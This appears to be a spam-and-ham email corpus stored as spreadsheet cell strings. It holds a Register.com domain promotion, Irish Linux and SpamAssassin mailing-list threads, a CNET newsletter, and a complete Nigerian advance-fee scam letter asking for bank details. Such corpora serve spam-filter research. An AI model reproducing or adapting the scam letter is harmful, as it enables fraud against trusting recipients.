 ght=3D"32"&gt; &lt;font size=3D"2" face=3D"verdana,arial,sanserif, helvetica"&gt;=A0=
 =A0&lt;b&gt;WWW.&lt;/b&gt;=A0 &lt;input type=3D"text" name=3D"vhost_name" size=3D"13" valu=
 e=3D"jmason"&gt;&lt;b&gt;.us&lt;/b&gt;&lt;/font&gt; &lt;/TD&gt;&lt;td width=3D"42" height=3D"32" align=3D=
 "right" valign=3D"bottom"&gt;&lt;input type=3D"image" name=3D"chk_domain" src=3D"=
 http://216.21.229.207/images/go_usemail.gif" width=3D"32" height=3D"32" bor=
 der=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3D3&gt;&lt;img src=3D"http://216.21.229.207/images/shad=
 ow.jpg" width=3D"555" height=3D"8"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/FORM&gt;&lt;/TD&gt;
 &lt;td width=3D"1" bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://216.21.229.207/image=
 s/cleardot.gif" width=3D"1"&gt;&lt;/td&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;!--left thick rule--&gt;
 &lt;td bgcolor=3D"#003399"&gt;&lt;IMG SRC=3D"http://216.21.229.207/images/cleardot.g=
 if" WIDTH=3D14 HEIGHT=3D204&gt;&lt;/TD&gt;
 &lt;td bgcolor=3D"#FFFFFF"&gt;
 &lt;table border=3D"0" cellpadding=3D"15"&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D"#FFFFFF"&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D3&gt;
 &lt;b&gt;What makes &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQ=
 c/name2"&gt;&lt;font color=3D"#0033CC"&gt;&lt;b&gt;.us&lt;/B&gt;&lt;/font&gt;&lt;/A&gt; unique and why do I =
 need it?&lt;/b&gt;
 &lt;/FONT&gt;
 &lt;BR&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D2&gt;
 The &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name2"&gt;&lt;=
 font color=3D"#0033CC"&gt;&lt;b&gt;.us&lt;/B&gt;&lt;/font&gt;&lt;/A&gt; domain is the only Web country=
  code for the U.S.A. America has more Internet users than any other country=
  - reach American customers with a Web address that speaks to them!=20=20=
 =20=20
 &lt;P&gt;
 An online American identity can be a key contributor to your efforts buildi=
 ng and protecting a consistent global brand. Let your prospects know you ha=
 ve an American presence. &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJ=
 MQ7eAHmwOoQc/name6?D=3Djmason"&gt;Request an American identity online&lt;/A&gt; at &lt;=
 b&gt;&lt;font color=3D"#990000"&gt;&lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3A=
 JMQ7eAHmwOoQc/name1?D=3Djmason"&gt;jmason.us&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;** for your company=
 .&lt;/FONT&gt;=20=20=20=20
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D3&gt;
 &lt;b&gt;What is the cost?&lt;/b&gt;
 &lt;/FONT&gt;
 &lt;BR&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D2&gt;
 America's Internet Address is being offered at special discounts:
 &lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;table border=3D"1" bordercolor=3D"#D0D9EC" width=3D"80%" cellspacing=3D"0"=
  cellpadding=3D"5"&gt;
 	&lt;tr&gt;
 =09
 		&lt;td colspan=3D"3" bgcolor=3D"#C2D5FB"&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D2&gt;&lt;b&gt;Save More&lt;/b&gt; By Addin=
 g More Years!&lt;/FONT&gt;
 		&lt;/td&gt;
 		&lt;/TR&gt;
 =09=09
 =09=09
 		&lt;TR&gt;
 =09=09
 		&lt;td bgcolor=3D"#EEF4FE"&gt;&lt;font size=3D"2" face=3D"verdana,arial,sanserif, =
 helvetica"&gt;Register For&lt;/font&gt;&lt;/td&gt;
 		&lt;td bgcolor=3D"#ECF0F7"&gt;&lt;font size=3D"2" face=3D"verdana,arial,sanserif, =
 helvetica"&gt;Your Discount***&lt;/font&gt;&lt;/td&gt;
 		&lt;td bgcolor=3D"#EEF4FE"&gt;&lt;font size=3D"2" face=3D"verdana,arial,sanserif, =
 helvetica"&gt;You'll Pay&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 =09
 	&lt;tr&gt;
 		&lt;td&gt;&lt;font size=3D"2" face=3D"verdana,arial,sanserif, helvetica"&gt;2 Years&lt;/=
 font&gt;&lt;/td&gt;
 =09=09
 		&lt;td&gt;&lt;font size=3D"2" face=3D"verdana,arial,sanserif, helvetica"&gt;10%&lt;/font=
 &gt;&lt;/td&gt;
 =09=09
 		&lt;td&gt;&lt;font size=3D"2" face=3D"verdana,arial,sanserif, helvetica"&gt;$63 &lt;/fon=
 t&gt;&lt;/td&gt;
 =09=09
 	&lt;/tr&gt;
 =09
 	&lt;tr&gt;
 		&lt;td&gt;&lt;font size=3D"3" face=3D"verdana,arial,sanserif, helvetica"&gt;5 Years&lt;/=
 font&gt;&lt;/td&gt;
 =09=09
 		&lt;td&gt;&lt;font size=3D"3" face=3D"verdana,arial,sanserif, helvetica"&gt;20%&lt;/font=
 &gt;&lt;/td&gt;
 =09=09
 		&lt;td&gt;&lt;font size=3D"3" face=3D"verdana,arial,sanserif, helvetica"&gt;$139&lt;/fon=
 t&gt;&lt;/td&gt;
 =09=09
 	&lt;/tr&gt;
 =09
 =09
 	&lt;tr&gt;
 		&lt;td&gt;&lt;font size=3D"3" face=3D"verdana,arial,sanserif, helvetica"&gt;&lt;b&gt;10 Yea=
 rs&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 =09=09
 		&lt;td&gt;&lt;font size=3D"3" face=3D"verdana,arial,sanserif, helvetica"&gt;&lt;b&gt;40%&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;
 =09=09
 		&lt;td&gt;&lt;font size=3D"3" face=3D"verdana,arial,sanserif, helvetica"&gt;&lt;b&gt;$209&lt;/=
 b&gt;&lt;/font&gt;&lt;/td&gt;
 =09=09
 	&lt;/tr&gt;
 =09
 =09
 &lt;/table&gt;
 &lt;BR&gt;
 &lt;font size=3D"2" face=3D"verdana,arial,sanserif, helvetica"&gt;&lt;a HREF=3D"http=
 ://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?D=3Djmason"&gt;Click her=
 e&lt;/a&gt; to lock-in these introductory prices for &lt;a HREF=3D"http://e.register=
 .com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name2"&gt;&lt;font color=3D"#0033CC"&gt;&lt;b&gt;.us&lt;/B=
 &gt;&lt;/font&gt;&lt;/A&gt; and for a limited time, get an unforgettable &lt;a HREF=3D"http:/=
 /e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name2"&gt;&lt;font color=3D"#0033CC=
 "&gt;&lt;b&gt;.us&lt;/B&gt;&lt;/font&gt;&lt;/A&gt; email address like:&lt;P&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=3D"#990000"&gt;&lt;a HREF=3D"http://e.register.com/a/hA84n=
 VcAEIqG3AJMQ7eAHmwOoQc/name1?D=3Djmason"&gt;Justin@jmason.us&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/c=
 enter&gt;&lt;p&gt;
 for only &lt;b&gt;$9.99&lt;/b&gt; for the first year.=20
 &lt;P&gt;
 Why use a difficult to remember email like JohnsConsulting2345@aol.com or J=
 anesAccounting6782@hotmail.com? Use Invitation Code "&lt;b&gt;EPR76S754&lt;/b&gt;" when=
  prompted during registration to receive this special price on email.=20=20
 &lt;P&gt;
 Remember - this is your chance to get &lt;b&gt;&lt;font color=3D"#990000"&gt;&lt;a HREF=3D=
 "http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?D=3Djmason"&gt;jmas=
 on.us&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;.=20
 &lt;BR&gt;
 &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?D=3Djm=
 ason"&gt;Act now&lt;/a&gt; - it may not be there tomorrow.
 &lt;/font&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;hr align=3D"center" size=3D"1" width=3D"100%" noshade&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"1" color=3D"#666666" face=3D"verdana, arial, sans serif"&gt;
 *Register.com's Email Service is only offered in one-year terms.
 &lt;br&gt;
 **Register.com makes no representations as to whether or not these names in=
 fringe or violate any trademark or intellectual property rights. Domain nam=
 es listed in this offer are subject to availability. You must meet certain =
 eligibility requirements to register a .us domain name.&lt;br&gt;
 ***Discounts are based on com/net/org regular pricing.
 &lt;p&gt;
 All registrations are subject to the terms of our Services Agreement, locat=
 ed &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name3"&gt;he=
 re&lt;/a&gt;.&lt;br&gt;
 To learn more about the disclosure and use of registration information in R=
 egister.com's published Privacy Notice, please &lt;a HREF=3D"http://e.register=
 .com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name5"&gt;click here&lt;/a&gt;. &lt;br&gt;
 .US registrations are also subject to the .US Top Level Domain Terms=20
 and Conditions, located &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJM=
 Q7eAHmwOoQc/name4"&gt;here&lt;/a&gt;.
 &lt;p&gt;
 Our email messages are intended to keep you informed of new promotions as t=
 hey become available. To UNSUBSCRIBE, please &lt;a href=3D"http://e.register.c=
 om/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/unsub"&gt;click here&lt;/a&gt;, but by doing so, yo=
 u may miss out on exciting new products and services to come!=20
 &lt;p&gt;
 &amp;copy;2002 Register.com, Inc. All rights reserved. "America's Internet=20
 Address" is a trademark of Neustar, Inc.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/TD&gt;
 &lt;!--right thin rule--&gt;
 &lt;td width=3D"1" bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://216.21.229.207/image=
 s/cleardot.gif" width=3D"1"&gt;&lt;/td&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;img src=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/spacer.gif"&gt;
 &lt;/body&gt;
 &lt;/HTML&gt;
 --=appc28ja3p6dz0bmkhsk6b117hp1hf--
</t>
  </si>
  <si>
    <t xml:space="preserve">Dublin said:
 &gt; If you copy the files from your disk to the c: partition and mark it as
 &gt; active it should work ...
 Yeah, I figured that, but it doesn't seem to ... well, if that's the case
 I'll give it another go tonight, maybe come back with some error messages.
 Just to clarify for those who didn't understand me initially - I have a
 floppy drive installed, but it doesn't physically work. There's nowhere
 handy to pick one up where I am, and I don't fancy waiting a few days for
 one to arrive from Peats.
 Thanks for the answers,
 Ciaran.
 &gt;
 &gt; You especially need io.sys, command.com and msdos.sys
 &gt;
 &gt; your cd driver .sys and read the autoexec.bat and config.sys files for
 &gt; hints on what you did with your boot floppy &lt;g&gt;
 &gt;
 &gt; P
 &gt;
 &gt; On Wed, 2002-08-21 at 14:07, Ciaran Johnston wrote:
 &gt;&gt; Hi folks,
 &gt;&gt; The situation is this: at home, I have a PC with 2 10Gig HDDs, and no
 &gt;&gt; (working) floppy drive. I have been running Linux solely for the last
 &gt;&gt; year, but recently got the urge to, among other things, play some of
 &gt;&gt; my Windoze games. I normally install the windows partition using a
 &gt;&gt; boot floppy which I have conveniently zipped up, but I haven't any way
 &gt;&gt; of writing or reading a floppy.
 &gt;&gt; So, how do I go about:
 &gt;&gt; 1. formatting a C: drive with system files (normally I would use
 &gt;&gt; format /s c: from the floppy).
 &gt;&gt; 2. Installing the CDROM drivers (my bootdisk (I wrote it many years
 &gt;&gt; ago) does this normally).
 &gt;&gt; 3. Booting from the partition?
 &gt;&gt;
 &gt;&gt; I wiped all my linux partitions from the first drive and created
 &gt;&gt; partitions for Windows (HDA1) Slackware and RedHat. I used cfdisk for
 &gt;&gt; this. I made the first drive (hda) bootable. I then installed the
 &gt;&gt; windows partition in LILO and reran lilo (installed in MBR). I copied
 &gt;&gt; the contents of boot.zip to my new windows partition and tried to boot
 &gt;&gt; it - all I get is a garbled line of squiggles.
 &gt;&gt;
 &gt;&gt; Anyone any ideas? I can't think of anywhere in Athlone to get a new
 &gt;&gt; floppy drive this evening...
 &gt;&gt;
 &gt;&gt; Thanks,
 &gt;&gt; Ciaran.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; --
 &gt;&gt; Irish Linux Users' Group: ilug@linux.ie
 &gt;&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt;&gt; information. List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PARTNERSHIP REQUEST
</t>
  </si>
  <si>
    <t xml:space="preserve">REQUEST FOR URGENT BUSINESS RELATIONSHIP 
 Dear Sir,
 Firstly, I must solicit your strictest confidentiality
 in this transaction. This is by virtue of its nature
 as being utterly CONFIDENTIAL and TOP SECRET. 
 Though I know that a transaction of this magnitude
 will make anyone apprehensive and worried, but I am
 assuring you that all will be well at the end of the
 day. 
 We have decided to contact you first by your email due
 to the urgency of this transaction, as we have been
 reliably informed that it will take at least two to
 three weeks for a normal post to reach you. So we
 decided it is best using the email. 
 Let me start by first introducing myself properly to
 you. I am Dr. Osaro Ame, a director general in the
 Ministry of Mines and Power and I head a Three-man
 tender board appointed by the Government of the
 Federal Republic of Nigeria to award contracts to
 individuals and companies and to approve such contract
 payments in the Ministry of Mines and Power. The
 duties of the committee also include evaluation,
 vetting and monitoring of work done by both foreign
 and local contractors in the ministry.
 I came to know of you in my search for a reliable and
 reputable person to handle a very confidential
 business transaction which involves the transfer of a
 huge sum of money to a foreign account requiring
 maximum confidence. In order to commence this
 business, we solicit for your assistance to enable us
 transfer into your account the said funds. 
 The source of this funds is as follows: Between 1996
 and 1997, this committee awarded contracts to various
 contractors for engineering, procurement, supply of
 electrical equipments such as Transformers, and some
 rural electrification projects. 
 However, these contracts were over-invoiced by the
 committee, thereby, leaving the sum of US$11.5million
 dollars (Eleven Million Five Hundred thousand United
 States Dollars) in excess. This was done with the
 intention that the committee will share the excess
 when the payments are approved. 
 The Federal Government have since approved the total
 contract sum which has been paid out to the companies
 and contractors concerned which executed the
 contracts, leaving the balance of $11.5m dollars,
 which we need your assistance to transfer into a safe
 off-shore and reliable account to be disbursed amongst
 ourselves.
 We need your assistance as the funds are presently
 secured in an escrow account of the Federal Government
 specifically set aside for the settlement of
 outstanding payments to foreign contractors. We are
 handicapped in this circumstances as the civil service
 code of conduct, does not allow us to operate
 off-shore accounts, hence your importance in the whole
 transaction is highly needed . 
 My colleagues and I have agreed that if you or your
 company can act as the beneficiary of this funds on
 our behalf, you or your company will retain 20% of the
 total amount of US$11,500,000.00 (Eleven Million Five
 Hundred Thousand United States Dollars), while 70%
 will be for us (members of this panel) and the
 remaining 10% will be used in offsetting all
 debts/expenses incurred (both local and foreign) in
 the cause of this transfer. Needless to say, the trust
 reposed on you at this juncture is enormous. In return
 we demand your complete honesty and trust. 
 It does not matter whether or not your company does
 contract projects of this nature described here, the
 assumption is that your company won the major contract
 and sub-contracted it out to other companies.  More
 often than not, big trading companies or firms of
 unrelated fields win major contracts and subcontract
 to more specialized firms for execution of such
 contracts. We are civil servants and we will not
 want to miss this once in a life time opportunity.
 You must however, NOTE that this transaction will be
 strictly based on the following terms and conditions
 as we have stated below, as we have heard confirmed
 cases of business associates running away with funds
 kept in their custody when it finally arrive their
 accounts. We have decided that this transaction will
 be based completely on the following: 
 (a). Our conviction of your transparent honesty and
 diligence. 
 (b). That you would treat this transaction with utmost
 secrecy and confidentiality. 
 (c). That upon receipt of the funds, you will promptly
 release our share (70%) on demand after you have
 removed your 20% and all expenses have been settled. 
 (d). You must be ready to produce us with enough
 information about yourself to put our minds at rest. 
 Please, note that this transaction is 100% legal and
 risk free and we hope to conclude the business in Ten
 Bank working days from the date of receipt of the
 necessary information and requirement from you. 
 Endeavour to acknowledge the receipt of this letter
 using my email fax number 1-443-658-2542 or my email
 address and I will bring you into the complete picture
 of this transaction when I have heard from you. 
 Your urgent response will be highly appreciated as we
 are already behind schedule for this financial
 quarter. 
 Thank you and God bless. 
 Yours faithfully, 
 Dr. Osaro Ame 
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Health - your guide to health and wellness
 http://health.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On 28 Aug 2002, Daniel Quinlan wrote:
 &gt; Dan Kohn &lt;dan@dankohn.com&gt; writes:
 &gt; 
 &gt; &gt; Daniel, it's easy enough for you to change the Habeas scores yourself
 &gt; &gt; on your installation.  If Habeas fails to live up to its promise to
 &gt; &gt; only license the warrant mark to non-spammers and to place all
 &gt; &gt; violators on the HIL, then I have no doubt that Justin and Craig will
 &gt; &gt; quickly remove us from the next release.  But, you're trying to kill
 &gt; &gt; Habeas before it has a chance to show any promise.
 &gt; 
 &gt; I think I've worked on SA enough to understand that I can localize a
 &gt; score.  I'm just not comfortable with using SpamAssassin as a vehicle
 &gt; for drumming up your business at the expense of our user base.
 I have to agree here.  If Habeas is going to die just because SA does not
 support it, that's a serious problem with the business model; but that is
 nobody's problem but Habeas's.
 A possible solution is for Habeas's business model to include some kind of
 incentive for users of SA to give it the benefit of the doubt.  I have yet
 to think of an incentive that fits the bill ...
 On Thu, 29 Aug 2002, Justin Mason wrote:
 &gt; I don't see a problem supporting it in SpamAssassin -- but I see Dan's
 &gt; points.
 &gt; 
 &gt;   - high score: as far as I can see, that's because SpamAssassin is
 &gt;     assigning such high scores to legit newsletters these days, and the
 &gt;     Habeas mark has to bring it down below that. :(   IMO we have to fix
 &gt;     the high-scorers anyway -- no spam ever *needs* to score over 5 in our
 &gt;     scoring system, 5 == tagged anyway.
 This is off the topic of the rest of this discussion, but amavisd (in all
 its incarnations) and MIMEDefang and several other MTA plugins all reject
 at SMTP time messages that scores higher than some threshold (often 10).  
 If some new release were to start scoring all spam no higher than 5.1,
 there'd better be _zero_ FPs, because all those filters would drop their
 thresholds to 5.
 On Thu, 29 Aug 2002, Michael Moncur wrote:
 &gt; But I agree that there needs to be more focus on eliminating rules that
 &gt; frequently hit on newsletters. If any newsletters actually use the Habeas
 &gt; mark, that will be one way to help.
 Newsletters won't use the mark.  Habeas is priced way too high -- a factor
 of at least 20 over what the market will bear, IMO -- on a per-message
 basis for most typical mailing lists (Lockergnome, say) to afford it.
 On Thu, 29 Aug 2002, Harold Hallikainen wrote:
 &gt; Habeus has come up with a very clever way to use existing law to battle
 &gt; spam. It seems that at some point they could drop the licensing fee to
 &gt; $1 or less and make all their income off suing the spammers for
 &gt; copyright infringement.
 Sorry, that just can't work.
 If the Habeas mark actually becomes both widespread enough in non-spam,
 and effectively-enforced enough to be absent from spam, such that, e.g.,
 SA could assign a positive score to messages that do NOT have it, then
 spammers are out of business and Habeas has no one to sue.  There's nobody
 left to charge except the people who want (or are forced against their
 will because their mail won't get through otherwise) to use the mark.
 Conversely, if there are enough spammers forging the mark for Habeas to
 make all its income suing them, then the mark is useless for the purpose
 for which it was designed.
 Either way it seems to me that, after maybe a couple of lawsuits against
 real spammers and a lot of cease-and-desist letters to clueless Mom&amp;Pops,
 then either (a) they're out of business, (b) they have to sell the rights
 to use the mark to increasingly questionable senders, or (c) they've both
 created and monopolized a market for "internet postage stamps" that
 everybody has to pay them for.
 The latter would be quite a coup if they [*] could pull it off -- they do
 absolutely nothing useful, unless you consider threatening people with
 lawsuits useful, yet still collect a fee either directly or indirectly
 from everyone on the internet -- effectively we'll be paying them for the
 privilege of policing their trademark for them.  I don't believe they'll
 ever get that far, but I don't particularly want to help them make it.
 [*] And I use the term "they" loosely, because the whole company could 
 consist of one lawyer if it really got to that point.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</si>
  <si>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I'm one of the 30,000 but it's not working very well this week with the
 TES updates and servers not syncing.  
 -----Original Message-----
 From: Jordan Ritter [mailto:jpr5@darkridge.com] 
 Sent: Thursday, August 08, 2002 4:45 PM
 To: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] What's wrong with the Razor servers now?
 On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:
 # Razor2 seems to have been a long time in coming, [...] and doesn't #
 currently work.
 Quite a strong statement, Craig, one which over 30,000 active users a
 day would strongly disagree with.
 --jordan
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Still hunting for the perfect RAM upgrade? (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: Components Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_components.gif" width="442" height="60" border="0" alt="CNET Shopper Components Edition"&gt;&lt;br&gt;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&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 				&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58wtiHivpV1xmYgHobjqmZR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/GoDaddy.gif.domainnames.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=35-d6JTIbIziyKe2gmKNXLTSyPWc3uR" &gt;Dell Dimension 8000&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJUEPN2ssxoLkkTKhn-yR" &gt;Toshiba Sat. 5105-S607&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_Z--qVy6fez6pa6cIJPR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSXVgbWnaRYG8Y0gSPZxnR" &gt;Dell Latitude C400&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1j62ED5ikUMBXB6W5WWcR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnKi1WvbHSCN0U7nQUDRR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTCrwWqnPAE64qDAwrPGFR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular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width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;
 					&lt;/td&gt;
 					&lt;td width=412&gt;
 						&lt;IMG height=8 src="/b.gif" width=1&gt;&lt;br&gt;
 							&lt;font face="Arial, Helvetica" size="-2"&gt;
 &lt;!-- DATE --&gt;					July 15, 2002
 							&lt;/font&gt;&lt;br&gt;
 						&lt;IMG height=8 src="/b.gif" width=1&gt;&lt;br&gt;
 							&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 								&lt;tr valign=top&gt;
 									&lt;td&gt;
 										&lt;font face="Arial, Helvetica"&gt;
 											&lt;font color="#333333"&gt;&lt;font size="-1"&gt;
 &lt;!-- INTRO --&gt;
 				&lt;B&gt;Dear Reader.&lt;/B&gt;								
 											&lt;/font&gt;&lt;BR&gt;
 											&lt;font face="arial, helvetica"&gt;
 												&lt;font size="-1"&gt;
 Whether you're building a new system or just want to
 upgrade your old one, finding the right RAM for your
 configuration is crucial to your system's success.
 &lt;P&gt;
 But with so many motherboards on the market, sometimes
 it can be tricky finding the exact RAM to meet your system's
 requirements.
 &lt;P&gt;
 Luckily, CNET's all-in-one &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBBpfSfSjg0SxiPZvH6cR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt; makes finding 
 the perfect memory easier than ever! Whatever your motherboard 
 type, you're just a few clicks away from the upgrade you'll 
 need to get your system living up to its full potential.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawxVj5o6tTbDS-BJjhoRR" &gt;&lt;B&gt;Check out CNET's new Memory Configurator&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 											&lt;/font&gt;
 										&lt;/font&gt;	
 									&lt;/td&gt;
 								&lt;/tr&gt;
 							&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 &lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#ffffff"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;br&gt;
 &lt;!--feature--&gt;
 			&lt;font face="Arial, Helvetica"&gt;
 				&lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;			
 					&lt;img src="http://www.cnet.com/i/nl/sh/sub_feat.gif" alt="Feature"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Feature Graphic --&gt;
 			&lt;/font&gt;
 			&lt;font face="arial, helvetica"&gt;
 			&lt;font size="-1"&gt;
 &lt;!-- Feature body --&gt;			
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQdqeIYxCs3CyJqsjeoFR" &gt;&lt;B&gt;Pentium 4 (2.0 GHz 512KB, 400MHz, Socket 478)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 &amp;#149; Lowest price: $190
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBPn90LHg3F-erCpGY99R" &gt;&lt;B&gt;Pentium 4 (2.2 GHz 512KB, 400MHz, Socket 478)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 &amp;#149; Lowest price: $232
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRzqmQD3Rl28NRQSnqQuR" &gt;&lt;B&gt;Pentium 4 (2.4GHz, 512KB, 400MHz, Socket 478)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 &amp;#149; Lowest price: $358
 &lt;/font&gt;
 			&lt;/font&gt;&lt;br clear=all&gt;&lt;br&gt;
 &lt;!-- /Featured Product Section --&gt;
 &lt;p&gt;&lt;!--In the News--&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/sub_news.gif" alt="In the news" width="150" height="19" border="0"&gt;&lt;br&gt;
